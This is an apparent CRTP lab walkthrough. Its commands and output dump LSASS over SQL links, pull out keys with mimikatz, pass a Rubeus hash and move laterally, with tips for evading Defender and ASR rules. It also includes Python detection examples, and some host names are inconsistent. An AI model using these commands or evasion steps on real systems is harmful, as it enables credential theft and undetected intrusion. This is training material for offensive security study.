Certified Red Team Professional (CRTP) - Notes
  • 1 - Compromise eu-sqlx again. Use opsec friendly alternatives to bypass MDE and MDI

23 - LO23

Learning Objective 23


Tasks

1 - Compromise eu-sqlx again. Use opsec-friendly alternatives to bypass MDE and MDI

Solutions

1 - Compromise eu-sqlx again. Use opsec-friendly alternatives to bypass MDE and MDI

Continuing from the previous Learning Objective, we have the ability to run commands as SYSTEM on eu-sqlx. This is ideal for performing an LSASS dump, which gives us persistent credential access to the machine.

To dump the memory of the LSASS process, we begin with minidumpdotnet, which is not detected by AV / MDE since it uses a custom implementation of the MiniDumpWriteDump() API call.

Tools Transfer and Execution

Downloads over HTTP, chained with other risky actions, increase the chances of detection, so we execute from an SMB share instead. We serve minidumpdotnet and FindLSASSPID (used to enumerate the LSASS PID) from a share on our student VM named studentsharex (C:\AD\Tools\studentsharex).

On the student VM, create an SMB share named studentsharex and grant Everyone, Guest and ANONYMOUS LOGON access in the share permissions.

Note: To make things easier in the lab, Guest access to file shares has been enabled so that eu-sqlx can reach our studentsharex. Note that your student machine name could also be dcorp-std867.

copy C:\AD\Tools\minidumpdotnet.exe \\dcorp-std867\studentshare867
copy C:\AD\Tools\FindLSASSPID.exe \\dcorp-std867\studentshare867

LSASS DUMP using Custom APIs

Next, use the SQL link crawl to run xp_cmdshell on eu-sqlx and enumerate the LSASS PID with FindLSASSPID.exe. Start a PowerShell session using InvisiShell, import PowerUpSQL and run the following commands:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\dcorp-student867.dollarcorp.moneycorp.local\studentshare867\FindLSASSPID.exe''' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : System.Data.DataRow
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

NOTE: The LSASS PID will be different for each lab instance.

To break a detection chain, we run benign queries between the risky ones. In the case of MDE, in our experience waiting about 10 minutes also helps avoid detection.

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'SELECT @@version' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : System.Data.DataRow
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

We can now perform an LSASS dump using the minidumpdotnet tool.

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\dcorp-studentx.dollarcorp.moneycorp.local\studentshare867\minidumpdotnet.exe 712 \\dcorp-student867.dollarcorp.moneycorp.local\studentshare867\monkey867.dmp ''' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : {The network path was not found., }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Perform another benign query for good measure to break any detection chain:

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'SELECT * FROM master.dbo.sysdatabases' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : {master, tempdb, model, msdb}
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :
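The two evasion ideas used above, executing from an SMB share and pausing with benign queries between the PID lookup and the dump, both target detection logic that correlates on short time windows. The following is an added example, not code from the CRTP course or from PowerUpSQL, showing how a defender can instead key correlation on the SQL Server service process that spawned each xp_cmdshell child, so the lookup and the dump land in one chain however long the pause between them. The event records are constructed in the shape of Sysmon process-create (ID 1) and process-access (ID 10) logs reduced to a few fields; host names, PIDs, share names and the dumper.exe name are assumptions made for illustration.

```python
"""Correlate processes spawned by SQL Server into one chain per service process.

Added example for this page, not code from the CRTP course or from PowerUpSQL.
Event records are constructed; host names, PIDs, share names and the
'dumper.exe' name are assumptions made for illustration.
"""
import re

UNC_RE = re.compile(r"\\\\[\w.-]+\\[\w.$-]+")      # \\host\share
DUMP_RE = re.compile(r"\.dmp\b", re.IGNORECASE)

# Constructed sample: PID lookup, a pause of more than ten minutes, then the
# dump; plus unrelated cmd.exe activity on another host that must not match.
EVENTS = [
    {"ts": 0, "host": "EU-SQL45", "kind": "create", "pid": 400, "ppid": 200,
     "parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c \\student-vm.example\share\FindLSASSPID.exe"},
    {"ts": 1, "host": "EU-SQL45", "kind": "create", "pid": 401, "ppid": 400,
     "parent": "cmd.exe", "image": "FindLSASSPID.exe",
     "cmdline": r"\\student-vm.example\share\FindLSASSPID.exe"},
    {"ts": 660, "host": "EU-SQL45", "kind": "create", "pid": 410, "ppid": 200,
     "parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c \\student-vm.example\share\dumper.exe 712 "
                r"\\student-vm.example\share\out.dmp"},
    {"ts": 661, "host": "EU-SQL45", "kind": "create", "pid": 411, "ppid": 410,
     "parent": "cmd.exe", "image": "dumper.exe",
     "cmdline": r"\\student-vm.example\share\dumper.exe 712 "
                r"\\student-vm.example\share\out.dmp"},
    {"ts": 662, "host": "EU-SQL45", "kind": "access", "pid": 411, "ppid": 410,
     "parent": "cmd.exe", "image": "dumper.exe", "target": "lsass.exe",
     "cmdline": ""},
    {"ts": 700, "host": "DCORP-MGMT", "kind": "create", "pid": 900, "ppid": 800,
     "parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def signals_for(event):
    """Per-event indicators; each one alone is weak, together they are not."""
    found = set()
    cmd = event.get("cmdline", "")
    if event["kind"] == "create" and event["parent"].lower() == "sqlservr.exe":
        found.add("xp_cmdshell_spawn")
    if UNC_RE.search(cmd):
        found.add("unc_path_in_cmdline")
    if DUMP_RE.search(cmd):
        found.add("minidump_filename")
    if event["kind"] == "access" and event.get("target", "").lower() == "lsass.exe":
        found.add("lsass_access")
    return found


def correlate(events):
    """Group events by (host, SQL service PID) using process lineage.

    Keying on the spawning service process instead of a sliding time window is
    what keeps the PID lookup and the dump in one chain even when minutes of
    benign queries separate them.
    """
    chains, owner = {}, {}
    for e in sorted(events, key=lambda x: x["ts"]):
        host, key = e["host"], None
        if e["kind"] == "create" and e["parent"].lower() == "sqlservr.exe":
            key = (host, e["ppid"])                 # the SQL service process
            owner[(host, e["pid"])] = key
        elif e["kind"] == "create" and (host, e["ppid"]) in owner:
            key = owner[(host, e["ppid"])]          # grandchild of the service
            owner[(host, e["pid"])] = key
        elif (host, e["pid"]) in owner:
            key = owner[(host, e["pid"])]           # e.g. a process-access event
        if key is None:
            continue
        chain = chains.setdefault(key, {"host": host, "events": [], "signals": set()})
        chain["events"].append(e)
        chain["signals"] |= signals_for(e)
    return chains


def severity(signals):
    """Rank a chain by the strongest combination of indicators it carries."""
    if "lsass_access" in signals or {"minidump_filename", "unc_path_in_cmdline"} <= signals:
        return "high"
    if {"xp_cmdshell_spawn", "unc_path_in_cmdline"} <= signals:
        return "medium"
    return "low"


def report(events):
    """One finding per chain: host, severity, span in seconds, sorted signals."""
    out = []
    for chain in correlate(events).values():
        ts = [e["ts"] for e in chain["events"]]
        out.append({"host": chain["host"], "severity": severity(chain["signals"]),
                    "span_s": max(ts) - min(ts), "signals": sorted(chain["signals"])})
    return sorted(out, key=lambda f: f["host"])


if __name__ == "__main__":
    for finding in report(EVENTS):
        print(finding)
```

Run as-is, the sample yields a single high-severity chain on EU-SQL45 spanning 662 seconds, while the interactive cmd.exe on DCORP-MGMT produces nothing because it has no sqlservr.exe ancestor. Real telemetry needs one addition before this is usable: a pid/ppid map that is rebuilt whenever the service restarts, since PIDs are reused.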

Back on our student VM we can now parse the exfiltrated LSASS minidump (monkey867.dmp) using mimikatz as follows. Run the below command from an elevated shell (Run as administrator):

NOTE: If you encounter errors parsing the minidump file, most likely your student VM memory is full. Attempt a quick fix by logging in and out of the student VM.

C:\AD\Tools\mimikatz.exe "sekurlsa::minidump C:\AD\Tools\studentshare867\monkey867.dmp" "sekurlsa::ekeys" "exit"

Now, use Overpass-the-hash on the student VM using Rubeus to start a process with privileges of the dbadmin user who is a member of eu.eurocorp.local. Run the below command from a high integrity process on student VM (Run as administrator):

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:dbadmin /aes256:ef21ff273f16d437948ca755d010d5a1571a5bda62a0a372b29c703ab0777d4f /domain:eu.eurocorp.local /dc:eu-dc.eu.eurocorp.local /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Lateral Movement - ASR Rules Bypass

We can now use winrs to access eu-sqlx. Run the below commands from the process spawned as dbadmin:

winrs -r:eu-sqlx.eu.eurocorp.local cmd
set username

Note that use of winrs is not detected by MDE but MDI (Microsoft Defender for Identity) detects it.

To avoid detection, we can use the WSManWinRM.exe tool. We append an ASR exclusion path such as "C:\Windows\ccmcache\" to the command line to avoid detection by the "Block process creations originating from PSExec and WMI commands" ASR rule. Run the below command from the process spawned as dbadmin:

NOTE: If the tool returns a value of 0, there is an error with command execution.

C:\AD\Tools\WSManWinRM.exe eu-sql867.eu.eurocorp.local "cmd /c set username C:\Windows\ccmcache\"

To see the command output, we can redirect it to the share on the student VM. This has very limited success and we are continuously trying ways to make it more effective.

C:\AD\Tools\WSManWinRM.exe eu-sql867.eu.eurocorp.local "cmd /c dir >> \\dcorp-student867.dollarcorp.moneycorp.local\studentshare867\out.txt C:\Windows\ccmcache\"
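The exclusion trick above works because the ASR rule matches an excluded path anywhere on the command line, so the path can ride along as an unused trailing argument. The following is an added example, not code from the CRTP course or from the WSManWinRM tool, that checks WinRM-spawned process creations for exactly that shape: a command line whose last token is a bare folder path inside a configured exclusion, optionally combined with output redirected to a UNC share. Log lines are constructed in a minimal parent|image|cmdline form; the exclusion list, the WinRM host process names (winrshost.exe, wsmprovhost.exe) and the host names are assumptions for this environment.

```python
"""Flag WinRM-spawned command lines carrying a dangling ASR-exclusion path.

Added example for this page, not code from the CRTP course or from WSManWinRM.
The log lines are constructed; exclusion folders and host names are assumptions.
"""
import re

# Processes that host remote WinRM commands (winrs / PowerShell remoting).
WINRM_HOSTS = {"wsmprovhost.exe", "winrshost.exe"}

# Assumed ASR exclusion folders for this environment (example values, lowercase).
EXCLUSION_DIRS = ["c:\\windows\\ccmcache\\"]

DIR_TOKEN_RE = re.compile(r"^[a-z]:\\.*\\$", re.IGNORECASE)   # bare folder, trailing '\'
UNC_REDIRECT_RE = re.compile(r">>?\s*\\\\[\w.-]+\\")            # '>' or '>>' to \\host\...

# Constructed sample in 'parent|image|cmdline' form.
SAMPLE_LOG = [
    "wsmprovhost.exe|cmd.exe|cmd /c set username C:\\Windows\\ccmcache\\",
    "wsmprovhost.exe|cmd.exe|cmd /c dir >> \\\\student-vm.example\\share\\out.txt C:\\Windows\\ccmcache\\",
    "wsmprovhost.exe|cmd.exe|cmd /c hostname",
    "explorer.exe|cmd.exe|cmd /c dir C:\\Windows\\ccmcache\\",   # local admin, not remote
]


def parse(line):
    """Split one constructed log line into its three fields."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def dangling_exclusion(cmdline):
    """Return the last token if it is a bare folder path under an exclusion."""
    tokens = cmdline.split()
    if not tokens:
        return None
    last = tokens[-1].lower()
    if DIR_TOKEN_RE.match(last) and any(last.startswith(d) for d in EXCLUSION_DIRS):
        return tokens[-1]
    return None


def evaluate(record):
    """Collect signals for one process creation and decide whether to alert.

    A trailing exclusion path on its own is noisy (admins do type folder paths);
    the alert requires the WinRM parent plus at least one other signal.
    """
    signals = []
    if record["parent"] in WINRM_HOSTS:
        signals.append("winrm_spawned")
    if dangling_exclusion(record["cmdline"]):
        signals.append("trailing_exclusion_path")
    if UNC_REDIRECT_RE.search(record["cmdline"]):
        signals.append("output_to_unc")
    alert = "winrm_spawned" in signals and len(signals) >= 2
    return {"alert": alert, "signals": signals, "cmdline": record["cmdline"]}


def scan(lines):
    """Evaluate every line; returns one result per line in input order."""
    return [evaluate(parse(line)) for line in lines]


if __name__ == "__main__":
    for result in scan(SAMPLE_LOG):
        print("ALERT " if result["alert"] else "ok    ", result["signals"], result["cmdline"])
```

The first two sample lines alert, the plain hostname call does not, and the local dir with a genuine folder argument is left alone because it has no WinRM parent. The more durable fix is on the configuration side: keep ASR exclusions to the minimum the deployment tooling needs and review them periodically, because any excluded folder is usable this way by whoever can run a command on the host.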